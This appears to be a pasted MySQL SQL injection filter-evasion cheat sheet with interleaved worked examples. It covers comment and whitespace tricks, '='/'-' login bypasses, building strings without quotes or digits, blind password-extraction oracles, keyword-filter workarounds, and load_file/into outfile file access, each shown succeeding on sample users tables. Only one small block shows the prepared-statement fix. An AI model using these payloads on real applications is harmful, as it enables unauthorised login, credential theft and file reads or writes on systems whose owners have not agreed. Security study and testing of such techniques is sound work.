Fadly31337

SQLi filter evasion cheat sheet (MySQL)

Oct 18th, 2020
[×]Basic filter[×]

Comments
or 1=1#
or 1=1-- -
or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1 union select 1,2 as `
' or#%0a1='1    (# and -- comments end at the newline, so the payload continues on the next line)
' or-- -%0a1='1
' /*!50000or*/1='1    (versioned comment: MySQL >= 5.0.0 executes the body, other parsers see a comment)
' /*!or*/1='1

Prefixes
+ - ~ !
' or --+2=- -!!!'2    (the parser accepts the prefix chain; --+ is not a comment because no whitespace follows the dashes. Check the value before relying on one: this chain reduces to 2=0)

Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, <=, >=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/    (%a0 only when the connection character set classifies 0xA0 as a space, e.g. latin1, not utf8mb4)
'or+(1)sounds/**/like"1"--%a0-
'union(select(1),table_name,(3)from`information_schema`.`tables`)#
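The whitespace and comment tricks above carried through on one query, as an added worked example that is not part of the original sheet. The `items` table, its row and the application query `SELECT id,name,1 FROM items WHERE name = '<input>'` are constructed for the illustration; each statement is that query as the server sees it after the shown input has been spliced in.

```sql
-- Constructed schema for the example (not from the original sheet)
CREATE TEMPORARY TABLE items (id INT PRIMARY KEY, name VARCHAR(32));
INSERT INTO items VALUES (1, 'apple');

-- Application query:  SELECT id,name,1 FROM items WHERE name = '<input>'
-- Expected result of every statement below: no items row (name '' matches nothing),
-- then one row per table in information_schema.tables.

-- Plain spaces, application quote balanced with ''=' instead of a comment:
--   input:  ' union select 1,table_name,3 from information_schema.tables where ''='
SELECT id,name,1 FROM items WHERE name = '' union select 1,table_name,3 from information_schema.tables where ''='';

-- No space character anywhere: parentheses and backticks give the tokenizer its boundaries.
--   input:  'union(select(1),table_name,(3)from`information_schema`.`tables`)#
SELECT id,name,1 FROM items WHERE name = ''union(select(1),table_name,(3)from`information_schema`.`tables`)#'
;   -- the # comments out the application's closing quote, so the delimiter has to follow on a new line

-- Comments as separators, "select" inside a versioned comment: MySQL >= 5.0.0 executes it,
-- a filter that strips or skips /* */ never sees the keyword.
--   input:  '/**/union/*!50000select*/1,table_name,3/**/from/**/information_schema.tables#
SELECT id,name,1 FROM items WHERE name = ''/**/union/*!50000select*/1,table_name,3/**/from/**/information_schema.tables#'
;

-- Newline as separator (%0a): the line comment ends at the newline and the statement continues,
-- which is the sheet's "' or#<newline>1='1" trick.
--   input:  '#<newline>union select 1,table_name,3 from information_schema.tables where ''='
SELECT id,name,1 FROM items WHERE name = ''#
union select 1,table_name,3 from information_schema.tables where ''='';
```

%09, %0b, %0c and %0d decode to tab, vertical tab, form feed and carriage return and separate tokens the same way as the newline; %a0 depends on the connection character set, so test it on the target before building payloads around it.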
  27.  
Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'

Strings without quotes
'abc' = 0x616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users

Typecasting
' or true = '1    (1 = 1)
' or round(pi(),1)+true+true = version()    (3.1+1+1 = 5.1; version() is cast to its leading number, so this one is specific to a 5.1 server)
' or '1    (true)

Compare operator typecasting
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = ''=''
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = ''-''
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
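The two bypasses and the typecasting chain evaluated on a real table, as an added worked example that is not part of the original sheet. The `users` table, its rows and the login query `SELECT * FROM users WHERE name = '<user>' AND pass = '<pass>'` are constructed for the illustration; the `PREPARE`/`EXECUTE` statements at the end stand in for the driver-level parameter binding an application would use, and show why the same inputs then match nothing.

```sql
-- Constructed data for the example (not from the original sheet)
CREATE TEMPORARY TABLE users (id INT PRIMARY KEY, name VARCHAR(32), pass VARCHAR(32));
INSERT INTO users VALUES (1,'admin','s3cret'), (2,'bob','hunter2');

-- The reduction steps from the sheet, evaluated directly. A non-numeric string casts to 0
-- (with a "Truncated incorrect DOUBLE value" warning, not an error, even in strict mode):
SELECT 'a'='b'='c', ('a'='b')='c', 0='c', 0=0;      -- 1, 1, 1, 1
SELECT ''='', ''-'', 's3cret'=0, 'admin'=0-0;        -- 1, 0, 1, 1

-- Login query:  SELECT * FROM users WHERE name = '<user>' AND pass = '<pass>'
-- Password input  '='  yields  pass = ''=''  which parses as (pass='')=''  ->  (0)=''  ->  0=0  ->  true
SELECT * FROM users WHERE name = 'admin' AND pass = ''='';      -- admin row returned

-- Password input  '-'  yields  pass = ''-''  which parses as pass=(''-'')  ->  pass=0  ->  's3cret'=0  ->  true
SELECT * FROM users WHERE name = 'admin' AND pass = ''-'';      -- admin row returned

-- Typecasting form  ' or '1  yields  pass = '' or '1'  ->  false or true; AND binds tighter than OR
SELECT * FROM users WHERE name = 'admin' AND pass = '' or '1';  -- every row returned

-- Fix: bind the values. The quote is now data inside the parameter and the expression
-- structure of the statement never changes.
PREPARE login FROM 'SELECT * FROM users WHERE name = ? AND pass = ?';
SET @u = 'admin', @p = '''=''';     -- the three-character string '=' exactly as the attacker sent it
EXECUTE login USING @u, @p;         -- no row
SET @p = '''-''';
EXECUTE login USING @u, @p;         -- no row
DEALLOCATE PREPARE login;
```

The comparisons succeed because `=` is evaluated left to right and MySQL casts the string side to a number; a column that is numeric, or a collation that refuses the cast, does not change the parse, only the final comparison.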
  71.  
[×]Function filter[×]

General function filtering
ascii (97)
load_file/*foo*/(0x616263)

Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings extracted from gadgets    (values from the 5.x server the sheet was written against; they depend on version and configuration, check them on the target)
collation(\N)    // binary
collation(user())    // utf8_general_ci
@@time_format    // %H:%i:%s
@@binlog_format    // MIXED
@@version_comment    // MySQL Community Server (GPL)
dayname(from_days(401))    // Monday
dayname(from_days(403))    // Wednesday
monthname(from_days(690))    // November
monthname(from_unixtime(1))    // January
collation(convert((1)using/**/koi8r))    // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2)    // latin2_czech_cs

Special characters extracted from gadgets
aes_encrypt(1,12)    // 4çh±{?"^c×HéÉEa
des_encrypt(1,2)    // ‚GÒ/ïÖk
@@ft_boolean_syntax    // + -><()~*:""&|
@@date_format    // %Y-%m-%d
@@innodb_log_group_home_dir    // .\
  105.  
Integer representations    (computed on a 5.1 server: version() casts to 5.1 in the entries that use it, recompute those for the target)
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36

@@new: 0
@@log_bin: 1

!pi(): 0
!!pi(): 1
true-~true: 3    (unsigned wrap-around; newer servers raise "BIGINT UNSIGNED value is out of range" here unless NO_UNSIGNED_SUBTRACTION is set)
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4

minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)
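A string spelled without quotes, and then without digits either, as an added example that is not part of the original sheet; it combines the conv() trick from "Strings with functions" with the pi()/true arithmetic in the table above. The target word 'admin' and the injection at the end are chosen for the illustration. The integer expressions are taken from the table except 18, which is rebuilt without version() so the result does not depend on the server release.

```sql
-- Target word 'admin' (chosen for the example). Each spelling compares equal to the literal:
SELECT
  'admin' = 0x61646d696e,                                 -- hex literal
  'admin' = char(97,100,109,105,110),                     -- char() of the code points
  'admin' = lower(concat(conv(10,10,36),conv(13,10,36),conv(22,10,36),conv(18,10,36),conv(23,10,36))),  -- base-36 digits A..Z
  'abc'   = unhex(616263);                                -- 1, 1, 1, 1
-- unhex() without quotes only works when every hex byte is 61..69 (the letters a to i):
-- 61646d696e contains letters, so as an unquoted token it is read as an identifier and the query fails.

-- No quotes and no digits. 10 = ceil(pi()*pi()) and 36 = floor(pow(pi(),pi())) from the table;
-- conv(n,10,36) returns the base-36 digit of n (10 -> A ... 35 -> Z), lower() gives the word.
SELECT lower(concat(
  conv(ceil(pi()*pi()),                 ceil(pi()*pi()), floor(pow(pi(),pi()))),   -- 10 -> A
  conv(floor(pi()*pi()+pi()),           ceil(pi()*pi()), floor(pow(pi(),pi()))),   -- 13 -> D
  conv(ceil(pi()*ceil(pi()+pi())),      ceil(pi()*pi()), floor(pow(pi(),pi()))),   -- 22 -> M
  conv(ceil(pi()*pi()+pi()+pi())+true,  ceil(pi()*pi()), floor(pow(pi(),pi()))),   -- 17+1 = 18 -> I
  conv(ceil((pi()+ceil(pi()))*pi()),    ceil(pi()*pi()), floor(pow(pi(),pi())))    -- 23 -> N
)) = 'admin';                                                                       -- 1

-- Use: a numeric injection point behind a filter that strips or escapes quotes, e.g.
--   id=0 or name=0x61646d696e
-- and, when digits are filtered as well, the expression above in place of the hex literal.
```

The conv() form is long but survives a filter that rejects quotes, hex literals and digits at once; when only quotes are filtered, the hex literal is the shortest option.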
  168.  
Extract substrings
substr('abc',1,1) = 'a'
substr('abc' from 1 for 1) = 'a'
substring('abc',1,1) = 'a'
substring('abc' from 1 for 1) = 'a'
mid('abc',1,1) = 'a'
mid('abc' from 1 for 1) = 'a'
lpad('abc',1,space(1)) = 'a'
rpad('abc',1,space(1)) = 'a'
left('abc',1) = 'a'
reverse(right(reverse('abc'),1)) = 'a'
insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
space(0) = trim(version()from(version()))    (empty string without quotes)

Search substrings
locate('a','abc')
position('a','abc')
position('a' IN 'abc')
instr('abc','a')
substring_index('ab','b',1)

Cut substrings
length(trim(leading 'a' FROM 'abc'))
length(replace('abc', 'a', ''))

Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))
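The extract, search, cut and compare primitives above run side by side as one boolean-blind test, as an added example that is not part of the original sheet. The `users` table, its row and the password are constructed; the point is that every column yields the same answer, so a filter on any one function name is worked around by switching to a neighbour.

```sql
-- Constructed data for the example (not from the original sheet)
CREATE TEMPORARY TABLE users (id INT PRIMARY KEY, name VARCHAR(32), pass VARCHAR(32));
INSERT INTO users VALUES (1,'admin','s3cret');

-- One question, "does pass start with s", asked with each primitive. Every column returns 1.
SELECT
  substr(pass,1,1)='s',
  substr(pass from 1 for 1)='s',
  mid(pass,1,1)='s',
  left(pass,1)='s',
  lpad(pass,1,space(1))='s',                             -- lpad/rpad truncate to the target length
  reverse(right(reverse(pass),1))='s',
  insert(insert(pass,1,0,space(0)),2,222,space(0))='s',  -- replace everything from position 2 with ''
  locate('s',pass)=1,                                    -- search instead of extract
  position('s' in pass)=1,
  instr(pass,'s')=1,
  length(trim(leading 's' from pass))=length(pass)-1,    -- cut: exactly one leading 's' removed
  strcmp(left(pass,1),'s')=0,
  find_in_set(left(pass,1),'s')=1,
  field(left(pass,1),'s')=1
FROM users WHERE id=1;

-- Code points instead of equality: a numeric compare turns the per-character guess into a
-- binary search over ascii values (s = 115, '3' = 51 = 0x33)
SELECT ascii(mid(pass,1,1)) BETWEEN 97 AND 122, ord(mid(pass,2,1))=51, hex(mid(pass,2,1))=33
FROM users WHERE id=1;                                   -- 1, 1, 1

-- Case: under the default case-insensitive collation 's'='S' holds, so an equality test leaks
-- nothing about case. Force a binary compare or hash both sides.
SELECT left(pass,1)='S', binary left(pass,1)='S', strcmp(binary left(pass,1),'S'), md5(left(pass,1))=md5('S')
FROM users WHERE id=1;                                   -- 1, 0, 1, 0

-- The same oracle injected into  SELECT * FROM users WHERE name = '<input>'
--   input:  admin' and locate('s',pass)=1 and ascii(mid(pass,2,1))>50 and ''='
SELECT * FROM users WHERE name = 'admin' and locate('s',pass)=1 and ascii(mid(pass,2,1))>50 and ''='';   -- admin row
```

Which primitives are really available depends on the filter, not the server: all of them exist on every supported MySQL release, so the first block doubles as a quick probe of what the filter lets through.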
  200.  
String length
length()
bit_length()
char_length()
octet_length()
bit_count()

String case
ucase
lcase
lower
upper
password('a') != password('A')    (password() was removed in MySQL 8.0, old_password() in 5.7.5)
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a',k) != aes_encrypt('A',k)    (any key k; aes_encrypt() takes two arguments)
des_encrypt('a') != des_encrypt('A')    (removed in MySQL 8.0)
  219.  
[×]Keyword filter[×]

Connected keyword filtering
(0)union(select(table_name),column_name,...
0/**/union/*!50000select*/table_name`foo`/**/...
0%a0union%a0select%09group_concat(table_name)...
0'union all select all`table_name`foo from`information_schema`. `tables`

Each heading below lists the keywords assumed to be filtered, cumulatively; the payloads avoid the newest one. They keep a plain and for readability, use && from the first group when it is blocked.

OR, AND
'||1='1
'&&1='1
'='
'-'

OR, AND, UNION
' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
' and (select pass from users where id =1)='a

OR, AND, UNION, LIMIT, WHERE
' and (select pass from users group by id having id = 1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP
' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
' and (select substr(group_concat(pass),1,1) from users)='a
' and substr((select max(pass) from users),1,1)='a
' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a
'='' into outfile '/var/www/dump.txt    (both need the FILE privilege and a path permitted by secure_file_priv)

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
' procedure analyse()#    (removed in MySQL 8.0)
'-if(name='Admin',1,0)#
'-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#
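The keyword progression carried through on one table, as an added worked example that is not part of the original sheet. The application query `SELECT * FROM users WHERE name = '<input>'`, the rows and the password values are constructed for the illustration; each statement is the full query after the input from the matching group above has been spliced in, and the comment gives the row set that comes back, which is the oracle.

```sql
-- Constructed data for the example (not from the original sheet)
CREATE TEMPORARY TABLE users (id INT PRIMARY KEY, name VARCHAR(32), pass VARCHAR(32));
INSERT INTO users VALUES (1,'Admin','s3cret'), (2,'bob','hunter2');

-- Application query:  SELECT * FROM users WHERE name = '<input>'

-- UNION filtered: compare a scalar subselect instead of appending rows
--   input:  bob' and (select pass from users limit 1)='s3cret
SELECT * FROM users WHERE name = 'bob' and (select pass from users limit 1)='s3cret';               -- bob

-- + LIMIT filtered: pick the row inside the subselect with WHERE
SELECT * FROM users WHERE name = 'bob' and (select pass from users where id=1)='s3cret';             -- bob

-- + WHERE filtered: GROUP BY the key and choose the group with HAVING
-- (pass is functionally dependent on the primary key, so only_full_group_by accepts the select list)
SELECT * FROM users WHERE name = 'bob' and (select pass from users group by id having id=1)='s3cret';   -- bob

-- + GROUP filtered: HAVING alone filters rows. Exactly one password starting with 's' -> one row,
-- condition true -> bob. None -> NULL -> no row. Several -> "Subquery returns more than 1 row":
-- an error, which is itself an answer.
SELECT * FROM users WHERE name = 'bob' and length((select pass from users having substr(pass,1,1)='s'))>0;   -- bob

-- + HAVING filtered: aggregate the whole table into one value
SELECT * FROM users WHERE name = 'bob' and substr((select max(pass) from users),1,1)='s';            -- bob
SELECT * FROM users WHERE name = 'bob' and (select substr(group_concat(pass),1,1) from users)='s';   -- bob

-- + SELECT filtered: no subquery, only arithmetic on the current row's own columns.
--   input:  '-if(name='Admin',1,0)#   ->   name = ''-if(...)   ->   name = 0-1 on the Admin row, 0-0 elsewhere
-- A row is kept when its name, cast to 0, equals the right side, i.e. when the inner test is FALSE
-- for that row; the Admin row vanishes exactly when the test holds. The # swallows the
-- application's closing quote, hence the delimiter on the next line.
SELECT * FROM users WHERE name = ''-if(name='Admin',1,0)#'
;   -- bob only
SELECT * FROM users WHERE name = ''-if(if(name='Admin',1,0),if(substr(pass,1,1)='s',1,0),0)#'
;   -- bob only: Admin's password starts with 's'
SELECT * FROM users WHERE name = ''-if(if(name='Admin',1,0),if(substr(pass,1,1)='x',1,0),0)#'
;   -- Admin and bob: the guess 'x' was wrong

-- if() filtered as well: CASE does the same job (see Control flow below)
SELECT * FROM users WHERE name = ''-(case when name='Admin' and substr(pass,1,1)='s' then 1 else 0 end)#'
;   -- bob only
```

The last group is the one worth remembering: with every row-selection keyword gone, the row under test is still addressed by a condition on its own columns, and presence or absence of that row in the response is the bit being extracted.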
  259.  
Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a'='a' then 1 [else 0] end
if('a'='a',1,0)
ifnull(nullif('a','a'),1)